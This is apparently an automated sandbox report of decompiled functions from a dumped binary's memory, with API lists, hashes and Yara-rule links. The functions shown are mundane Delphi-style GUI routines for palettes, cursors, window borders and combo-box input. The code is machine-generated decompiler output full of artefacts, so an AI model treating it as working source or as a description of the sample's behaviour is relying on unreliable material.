						_push(_t49);
						_push(0x42c9bf);
						_push( *[fs:eax]);
						 *[fs:eax] = _t52;
						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
						_pop(_t44);
						 *[fs:eax] = _t44;
						_push(0x42c9c6);
						SelectObject(_v16, _v20);
						DeleteDC(_v16);
						return ReleaseDC(0, _v12);
					}
				}
			}

0x0042c910
0x0042c911
0x0042c913
0x0042c91b
0x0042c91e
0x0042c922
0x0042c9c6
0x0042c9cb
0x0042c933
0x0042c941
0x0042c946
0x0042c94a
0x00000000
0x0042c94c
0x0042c953
0x0042c95f
0x0042c96c
0x0042c971
0x0042c972
0x0042c977
0x0042c97a
0x0042c98b
0x0042c992
0x0042c995
0x0042c998
0x0042c9a5
0x0042c9ae
0x0042c9be
0x0042c9be
0x0042c94a

APIs

Part of subcall function 0042A074: GetObjectA.GDI32(?,00000004), ref: 0042A08B
Part of subcall function 0042A074: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042A0AE

GetDC.USER32(00000000), ref: 0042C94E
CreateCompatibleDC.GDI32(?), ref: 0042C95A
SelectObject.GDI32(?), ref: 0042C967
SetDIBColorTable.GDI32(?,00000000,00000000,?), ref: 0042C98B
SelectObject.GDI32(?,?), ref: 0042C9A5
DeleteDC.GDI32(?), ref: 0042C9AE
ReleaseDC.USER32(00000000,?), ref: 0042C9B9

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: eb2f09f46152e42e0302b3d2ec58d1cfcc2a1c4c4f2c1ea1e6191820d04333f0
Instruction ID: 25070bdc39e239a1cc3928b6de81c0463c4aa06ed26b45da8391fb775581838c
Opcode Fuzzy Hash: eb2f09f46152e42e0302b3d2ec58d1cfcc2a1c4c4f2c1ea1e6191820d04333f0
Instruction Fuzzy Hash: 11116AB2E042197BDB10DFE5DC81AAEB3BCEF48704F4145B6F504E7281D6799E504758

Uniqueness

Uniqueness Score: -1.00%

Function 00465408, Relevance: 10.6, APIs: 7, Instructions: 57
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00465408(long __eax, void* __ecx, short __edx) {
				struct tagPOINT _v24;
				long _t7;
				long _t12;
				long _t19;
				void* _t21;
				struct HWND__* _t27;
				short _t28;
				void* _t30;
				struct tagPOINT* _t31;

				_t21 = __ecx;
				_t7 = __eax;
				_t31 = _t30 + 0xfffffff8;
				_t28 = __edx;
				_t19 = __eax;
				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
					L6:
					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
				} else {
					 *((short*)(__eax + 0x44)) = __edx;
					if(__edx != 0) {
						L5:
						_t7 = SetCursor(E004653CC(_t19, _t21, _t28));
						goto L6;
					} else {
						GetCursorPos(_t31);
						_push(_v24.y);
						_t27 = WindowFromPoint(_v24);
						if(_t27 == 0) {
							goto L5;
						} else {
							_t12 = GetWindowThreadProcessId(_t27, 0);
							if(_t12 != GetCurrentThreadId()) {
								goto L5;
							} else {
								_t7 = SendMessageA(_t27, 0x20, _t27, E004074FC(SendMessageA(_t27, 0x84, 0, E0040759C(_t31, _t21)), 0x200));
							}
						}
					}
				}
				return _t7;
			}

0x00465408
0x00465408
0x0046540c
0x0046540f
0x00465411
0x00465417
0x0046548c
0x0046548c
0x00465419
0x00465419
0x00465420
0x0046547c
0x00465487
0x00000000
0x00465422
0x00465423
0x00465428
0x00465435
0x00465439
0x00000000
0x0046543b
0x0046543e
0x0046544c
0x00000000
0x0046544e
0x00465475
0x00465475
0x0046544c
0x00465439
0x00465420
0x00465495

APIs

GetCursorPos.USER32 ref: 00465423
WindowFromPoint.USER32 ref: 00465430
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046543E
GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00465445
SendMessageA.USER32 ref: 0046545E
SendMessageA.USER32 ref: 00465475
SetCursor.USER32(00000000), ref: 00465487

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 88b484d038cc02734c2dc90dc462b37fc91989a89aedb65f05f8813fb676d397
Instruction ID: 9fc41d2593eb3400b1b8e62b4a648277ebb3b754d540924fa76a9c18da867d3c
Opcode Fuzzy Hash: 88b484d038cc02734c2dc90dc462b37fc91989a89aedb65f05f8813fb676d397
Instruction Fuzzy Hash: E701882260964425D62036754C86F7F39689B84B55F1040BFBE04BA2C3FE7DAC41A26F

Uniqueness

Uniqueness Score: -1.00%

Function 0049AC24, Relevance: 9.5, APIs: 6, Instructions: 477
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0049AC24(intOrPtr __eax, struct HDC__* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v21;
				struct tagRECT _v37;
				struct tagRECT _v53;
				void* __edi;
				void* __ebp;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr _t459;
				intOrPtr _t489;
				signed int _t491;
				intOrPtr _t498;
				struct HDC__* _t531;
				intOrPtr _t535;
				void* _t537;
				void* _t539;
				intOrPtr _t540;

				_t537 = _t539;
				_t540 = _t539 + 0xffffffcc;
				_t531 = __edx;
				_v8 = __eax;
				_t270 = _v8;
				_t489 =  *0x49b30c; // 0x0
				_t542 = _t489 -  *((intOrPtr*)(_t270 + 0x208));
				if(_t489 ==  *((intOrPtr*)(_t270 + 0x208))) {
					return _t270;
				} else {
					_t272 =  *((intOrPtr*)(_v8 + 0x20a));
					_t491 =  *((intOrPtr*)(_v8 + 0x209));
					_t464 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
					_v21 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
					_t459 =  *((intOrPtr*)(E0049B330(_v8, _t542) + 0x40));
					_t535 =  *((intOrPtr*)(E0049B330(_v8, _t542) + 0x40));
					if(0 > 0xb) {
						L9:
						_v16 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
						_v20 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
						_t459 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
						_t535 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
					} else {
						switch( *((intOrPtr*)(0 +  &M0049AC97))) {
							case 0:
								_v16 = E0048A3D8( *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40)), 0x13, __fp0);
								_v20 = E0048A498( *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40)), 0xffffffce, __fp0);
								goto L10;
							case 1:
								goto L9;
							case 2:
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								_v16 = __eax;
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E0048A3D8(__eax, 0x13, __fp0);
								_v20 = __eax;
								goto L10;
							case 3:
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E0048A3D8(__eax, 0x13, __fp0);
								__edx = 0xffffffe2;
								__eax = E0048A498(__eax, 0xffffffe2, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E0048A498(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								_v16 = __eax;
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffe7;
								__eax = E0048A498(__eax, 0xffffffe7, __fp0);
								_v20 = __eax;
								goto L10;
							case 4:
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E0048A3D8(__eax, 0x13, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E0048A498(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								_v16 = __eax;
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E0048A3D8(__eax, 0x13, __fp0);
								_v20 = __eax;
								goto L10;
							case 5:
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E0048A498(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E0048A3D8(__eax, 0x13, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								_v16 = __eax;
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E0048A498(__eax, 0xffffffce, __fp0);
								_v20 = __eax;
								goto L10;
							case 6:
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								__eax = E0048A498(__eax, 0xffffffce, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E0048A3D8(__eax, 0x13, __fp0);
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0xffffffce;
								_v16 = __eax;
								__eax = _v8;
								__eax = E0049B330(_v8, __eflags);
								__eax =  *((intOrPtr*)(__eax + 0x40));
								__edx = 0x13;
								__eax = E0048A3D8(__eax, 0x13, __fp0);
								_v20 = __eax;
								goto L10;
						}
					}
					L10:
					GetClientRect(E0044D590(_v8),  &_v37);
					GetWindowRect(E0044D590(_v8),  &_v53);
					MapWindowPoints(0, E0044D590(_v8),  &_v53, 2);
					OffsetRect( &_v37,  ~(_v53.left),  ~(_v53.top));
					ExcludeClipRect(_t531, _v37, _v37.top, _v37.right, _v37.bottom);
					OffsetRect( &_v53,  ~(_v53.left),  ~(_v53.top));
					_v12 = E004294DC( *((intOrPtr*)(_v8 + 0x21c)));
					_push(_t537);
					_push(0x49b2fb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t540;
					E0042955C( *((intOrPtr*)(_v8 + 0x21c)), _t531);
					E00428A88( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, 1, _t531, _t537);
					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v16, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right);
							_t464 = _v53.top;
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left - 1);
						}
						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.left);
							_t464 = _v53.bottom;
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom, _v53.left);
						}
					}
					if(( *(_v8 + 0x208) & 0x00000002) != 0 || ( *(_v8 + 0x208) & 0x00000001) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t459, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000002) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 1);
							_t464 = _v53.top + 1;
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
						}
						if(( *(_v8 + 0x208) & 0x00000001) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.left + 1);
							_t464 = _v53.bottom - 2;
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left + 1);
						}
					}
					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 && ( *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 ||  *((char*)(_v8 + 0x20a)) == 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0)) {
						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _v20, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top, _v53.right - 1);
							_t464 = _v53.bottom - 1;
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
						}
						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.right - 1);
							_t464 = _v53.bottom - 1;
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 1, _v53.left - 1);
						}
					}
					if(( *(_v8 + 0x208) & 0x00000008) != 0 || ( *(_v8 + 0x208) & 0x00000004) != 0 &&  *((intOrPtr*)(_v8 + 0x20a)) - 0xffffffffffffffff < 0 &&  *((intOrPtr*)(_v8 + 0x209)) - 0xffffffffffffffff < 0) {
						E0042897C( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _t464, _t535, _t531, _t537);
						if(( *(_v8 + 0x208) & 0x00000004) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.top + 1, _v53.right - 2);
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
						}
						if(( *(_v8 + 0x208) & 0x00000008) != 0) {
							E004290E0( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.right - 2);
							E00429080( *((intOrPtr*)(_v8 + 0x21c)), _v53.bottom - 2, _v53.left);
						}
					}
					_pop(_t498);
					 *[fs:eax] = _t498;
					_push(0x49b302);
					return E0042955C( *((intOrPtr*)(_v8 + 0x21c)), _v12);
				}
			}

0x0049ac25
0x0049ac27
0x0049ac2d
0x0049ac2f
0x0049ac32
0x0049ac35
0x0049ac3b
0x0049ac41
0x0049b308
0x0049ac47
0x0049ac4a
0x0049ac55
0x0049ac66
0x0049ac69
0x0049ac74
0x0049ac7f
0x0049ac8a
0x0049aec4
0x0049aecf
0x0049aedd
0x0049aee8
0x0049aef3
0x0049ac90
0x0049ac90
0x00000000
0x0049acdc
0x0049acf4
0x00000000
0x00000000
0x00000000
0x00000000
0x0049acfc
0x0049acff
0x0049ad04
0x0049ad07
0x0049ad11
0x0049ad14
0x0049ad17
0x0049ad1c
0x0049ad1f
0x0049ad24
0x0049ad29
0x00000000
0x00000000
0x0049ad31
0x0049ad34
0x0049ad39
0x0049ad3c
0x0049ad41
0x0049ad46
0x0049ad4b
0x0049ad52
0x0049ad55
0x0049ad5a
0x0049ad5d
0x0049ad62
0x0049ad69
0x0049ad6c
0x0049ad71
0x0049ad74
0x0049ad7e
0x0049ad81
0x0049ad84
0x0049ad89
0x0049ad8c
0x0049ad91
0x0049ad96
0x00000000
0x00000000
0x0049ad9e
0x0049ada1
0x0049ada6
0x0049ada9
0x0049adae
0x0049adb5
0x0049adb8
0x0049adbd
0x0049adc0
0x0049adc5
0x0049adcc
0x0049adcf
0x0049add4
0x0049add7
0x0049ade1
0x0049ade4
0x0049ade7
0x0049adec
0x0049adef
0x0049adf4
0x0049adf9
0x00000000
0x00000000
0x0049ae01
0x0049ae04
0x0049ae09
0x0049ae0c
0x0049ae11
0x0049ae18
0x0049ae1b
0x0049ae20
0x0049ae23
0x0049ae28
0x0049ae2f
0x0049ae32
0x0049ae37
0x0049ae3a
0x0049ae44
0x0049ae47
0x0049ae4a
0x0049ae4f
0x0049ae52
0x0049ae57
0x0049ae5c
0x00000000
0x00000000
0x0049ae64
0x0049ae67
0x0049ae6c
0x0049ae6f
0x0049ae74
0x0049ae7b
0x0049ae7e
0x0049ae83
0x0049ae86
0x0049ae8b
0x0049ae92
0x0049ae95
0x0049ae9a
0x0049ae9d
0x0049aea7
0x0049aeaa
0x0049aead
0x0049aeb2
0x0049aeb5
0x0049aeba
0x0049aebf
0x00000000
0x00000000
0x0049ac90
0x0049aef6
0x0049af03
0x0049af15
0x0049af2b
0x0049af40
0x0049af56
0x0049af6b
0x0049af7e
0x0049af83
0x0049af84
0x0049af89
0x0049af8c
0x0049af9a
0x0049afb0
0x0049afbf
0x0049b00c
0x0049b01b
0x0049b02c
0x0049b03e
0x0049b041
0x0049b041
0x0049b050
0x0049b061
0x0049b06f
0x0049b075
0x0049b075
0x0049b050
0x0049b084
0x0049b0c8
0x0049b0d7
0x0049b0ea
0x0049b0f2
0x0049b100
0x0049b100
0x0049b10f
0x0049b122
0x0049b12a
0x0049b13a
0x0049b13a
0x0049b10f
0x0049b149
0x0049b19a
0x0049b1a9
0x0049b1bb
0x0049b1c3
0x0049b1d1
0x0049b1d1
0x0049b1e0
0x0049b1f3
0x0049b1fb
0x0049b209
0x0049b209
0x0049b1e0
0x0049b218
0x0049b25c
0x0049b26b
0x0049b280
0x0049b29a
0x0049b29a
0x0049b2a9
0x0049b2c0
0x0049b2d7
0x0049b2d7
0x0049b2a9
0x0049b2de
0x0049b2e1
0x0049b2e4
0x0049b2fa
0x0049b2fa

APIs

GetClientRect.USER32 ref: 0049AF03
GetWindowRect.USER32 ref: 0049AF15
MapWindowPoints.USER32 ref: 0049AF2B
OffsetRect.USER32 ref: 0049AF40
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0049AF56
OffsetRect.USER32 ref: 0049AF6B

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$OffsetWindow$ClientClipExcludePoints
String ID:
API String ID: 435961686-0
Opcode ID: 8c2f7243cc17b1b8e22b356c4a933540b5c2df9e233d963e7aeee3dc8bfce65e
Instruction ID: d5b216787b4852c36f96583f63d30f291f93d0f5b71de8b966ee4ce4873c2356
Opcode Fuzzy Hash: 8c2f7243cc17b1b8e22b356c4a933540b5c2df9e233d963e7aeee3dc8bfce65e
Instruction Fuzzy Hash: 3E22EB34B042089FCB10EBA9D585EDEBBF1EF48304F6541E6E855AB362D734AE02DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0043B458, Relevance: 9.3, APIs: 6, Instructions: 286
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0043B458(intOrPtr __eax, void* __ebx, signed int* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v44;
				struct tagMSG _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				long _t115;
				void* _t119;
				intOrPtr _t122;
				void* _t130;
				void* _t133;
				void* _t139;
				signed int _t148;
				void* _t152;
				long _t167;
				void* _t177;
				intOrPtr _t178;
				signed int _t180;
				intOrPtr _t184;
				signed int _t186;
				signed int _t195;
				int _t199;
				signed int _t205;
				signed int _t220;
				signed int* _t232;
				void* _t233;
				intOrPtr _t251;
				intOrPtr _t256;
				void* _t284;
				signed int _t293;
				intOrPtr _t295;
				intOrPtr _t296;

				_t291 = __esi;
				_t288 = __edi;
				_t295 = _t296;
				_t233 = 0xb;
				do {
					_push(0);
					_push(0);
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t232 = __edx;
				_v8 = __eax;
				_push(_t295);
				_push(0x43b810);
				_push( *[fs:eax]);
				 *[fs:eax] = _t296;
				E0044C574(_v8, __edx);
				if( *((char*)(_v8 + 0x268)) == 0) {
					L40:
					_pop(_t251);
					 *[fs:eax] = _t251;
					_push(0x43b817);
					E004043FC( &_v92, 5);
					E004043D8( &_v72);
					E004043FC( &_v68, 2);
					E004043FC( &_v60, 2);
					return E004043FC( &_v24, 2);
				} else {
					if( *((intOrPtr*)(_v8 + 0x276)) - 2 >= 0) {
						_t115 = GetTickCount();
						_t256 = _v8;
						__eflags = _t115 -  *((intOrPtr*)(_t256 + 0x26c)) - 0x1f4;
						if(_t115 -  *((intOrPtr*)(_t256 + 0x26c)) >= 0x1f4) {
							__eflags = _v8 + 0x270;
							E004043D8(_v8 + 0x270);
						}
						 *((intOrPtr*)(_v8 + 0x26c)) = GetTickCount();
					} else {
						E00446D44(_v8,  &_v56);
						E0040442C(_v8 + 0x270, _v56);
					}
					_t119 =  *_t232 - 8;
					if(_t119 == 0) {
						__eflags = E0043B364( &_v12,  &_v16, _t295);
						if(__eflags == 0) {
							_t122 = _v8;
							__eflags =  *((intOrPtr*)(_t122 + 0x276)) - 2;
							if( *((intOrPtr*)(_t122 + 0x276)) - 2 >= 0) {
								while(1) {
									L24:
									_t130 = E0040D4D0( *(_v8 + 0x270), E00404698( *(_v8 + 0x270)));
									__eflags = _t130 - 2;
									if(_t130 != 2) {
										break;
									}
									_t133 = E00404698( *(_v8 + 0x270));
									__eflags = _v8 + 0x270;
									E00404938(_v8 + 0x270, 1, _t133);
								}
								_t139 = E00404698( *(_v8 + 0x270));
								__eflags = _v8 + 0x270;
								E00404938(_v8 + 0x270, 1, _t139);
								L26:
								 *_t232 = 0;
								E00403814(_v8, __eflags);
								goto L40;
							}
							E00446D44(_v8,  &_v60);
							_t148 = E00404698(_v60);
							__eflags = _t148;
							if(_t148 <= 0) {
								goto L24;
							}
							E00446D44(_v8,  &_v24);
							_t293 = _v12;
							while(1) {
								_t152 = E0040D4D0(_v24, _t293);
								__eflags = _t152 - 2;
								if(_t152 != 2) {
									break;
								}
								_t293 = _t293 - 1;
								__eflags = _t293;
							}
							E004048F8(_v24, _t293 - 1, 1,  &_v20);
							SendMessageA(E0044D590(_v8), 0x14e, 0xffffffff, 0);
							E004048F8(_v24, 0x7fffffff, _v16 + 1,  &_v68);
							E004046E4( &_v64, _v68, _v20);
							E00446D74(_v8, _t232, _v64, _t293);
							_t167 = E004075BC();
							SendMessageA(E0044D590(_v8), 0x142, 0, _t167);
							E00446D44(_v8,  &_v72);
							E0040442C(_v8 + 0x270, _v72);
							goto L26;
						}
						E0043B390(_t232, _t291, __eflags, _t295);
						goto L26;
					} else {
						_t177 = _t119 - 1;
						if(_t177 == 0) {
							_t178 = _v8;
							__eflags =  *((char*)(_t178 + 0x269));
							if( *((char*)(_t178 + 0x269)) != 0) {
								_t180 = E0043A38C(_v8);
								__eflags = _t180;
								if(_t180 != 0) {
									E0043A3B0(_v8, 0);
								}
							}
						} else {
							if(_t177 != 0x12) {
								_t184 = _v8;
								__eflags =  *((char*)(_t184 + 0x269));
								if( *((char*)(_t184 + 0x269)) != 0) {
									_t220 = E0043A38C(_v8);
									__eflags = _t220;
									if(_t220 == 0) {
										E0043A3B0(_v8, 1);
									}
								}
								_t186 = E0043B364( &_v12,  &_v16, _t295);
								__eflags = _t186;
								if(_t186 == 0) {
									E004045C0();
									E004046E4( &_v24, _v84,  *(_v8 + 0x270));
								} else {
									E004048F8( *(_v8 + 0x270), _v12, 1,  &_v76);
									_push(_v76);
									E004045C0();
									_pop(_t284);
									E004046E4( &_v24, _v80, _t284);
								}
								__eflags =  *_t232 & 0x000000ff;
								asm("bt [edx], eax");
								if(( *_t232 & 0x000000ff) >= 0) {
									_t195 = E0043B820(_v8, _t232, _v24, _t288, _t291);
									__eflags = _t195;
									if(_t195 != 0) {
										 *_t232 = 0;
									}
								} else {
									_t199 = PeekMessageA( &_v52, E0044D590(_v8), 0, 0, 0);
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _v52.message - 0x102;
										if(_v52.message == 0x102) {
											E004045C0();
											E004046E4( &_v88, _v92, _v24);
											_t205 = E0043B820(_v8, _t232, _v88, _t288, _t291);
											__eflags = _t205;
											if(_t205 != 0) {
												PeekMessageA( &_v52, E0044D590(_v8), 0, 0, 1);
												 *_t232 = 0;
											}
										}
									}
								}
							}
						}
						goto L40;
					}
				}
			}

0x0043b458
0x0043b458
0x0043b459
0x0043b45b
0x0043b460
0x0043b460
0x0043b462
0x0043b464
0x0043b464
0x0043b467
0x0043b468
0x0043b469
0x0043b46a
0x0043b46c
0x0043b471
0x0043b472
0x0043b477
0x0043b47a
0x0043b482
0x0043b491
0x0043b7c6
0x0043b7c8
0x0043b7cb
0x0043b7ce
0x0043b7db
0x0043b7e3
0x0043b7f0
0x0043b7fd
0x0043b80f
0x0043b497
0x0043b4a2
0x0043b4c1
0x0043b4c6
0x0043b4cf
0x0043b4d4
0x0043b4d9
0x0043b4de
0x0043b4de
0x0043b4eb
0x0043b4a4
0x0043b4aa
0x0043b4ba
0x0043b4ba
0x0043b4f3
0x0043b4f5
0x0043b544
0x0043b546
0x0043b554
0x0043b55d
0x0043b55f
0x0043b659
0x0043b659
0x0043b672
0x0043b677
0x0043b679
0x00000000
0x00000000
0x0043b640
0x0043b64a
0x0043b654
0x0043b654
0x0043b684
0x0043b68e
0x0043b698
0x0043b69d
0x0043b69d
0x0043b6a7
0x00000000
0x0043b6a7
0x0043b56b
0x0043b573
0x0043b578
0x0043b57a
0x00000000
0x00000000
0x0043b586
0x0043b58b
0x0043b591
0x0043b596
0x0043b59b
0x0043b59d
0x00000000
0x00000000
0x0043b590
0x0043b590
0x0043b590
0x0043b5ae
0x0043b5c5
0x0043b5da
0x0043b5e8
0x0043b5f3
0x0043b5ff
0x0043b615
0x0043b620
0x0043b630
0x00000000
0x0043b630
0x0043b549
0x00000000
0x0043b4f7
0x0043b4f7
0x0043b4f9
0x0043b508
0x0043b50b
0x0043b512
0x0043b51b
0x0043b520
0x0043b522
0x0043b52d
0x0043b52d
0x0043b522
0x0043b4fb
0x0043b4fd
0x0043b6b1
0x0043b6b4
0x0043b6bb
0x0043b6c0
0x0043b6c5
0x0043b6c7
0x0043b6ce
0x0043b6ce
0x0043b6c7
0x0043b6da
0x0043b6e0
0x0043b6e2
0x0043b71f
0x0043b733
0x0043b6e4
0x0043b6f9
0x0043b701
0x0043b707
0x0043b712
0x0043b713
0x0043b713
0x0043b740
0x0043b745
0x0043b748
0x0043b7ba
0x0043b7bf
0x0043b7c1
0x0043b7c3
0x0043b7c3
0x0043b74a
0x0043b75d
0x0043b762
0x0043b764
0x0043b766
0x0043b76d
0x0043b775
0x0043b783
0x0043b78e
0x0043b793
0x0043b795
0x0043b7aa
0x0043b7af
0x0043b7af
0x0043b795
0x0043b76d
0x0043b764
0x0043b748
0x0043b4fd
0x00000000
0x0043b4f9
0x0043b4f5

APIs

GetTickCount.KERNEL32 ref: 0043B4C1
GetTickCount.KERNEL32 ref: 0043B4E3

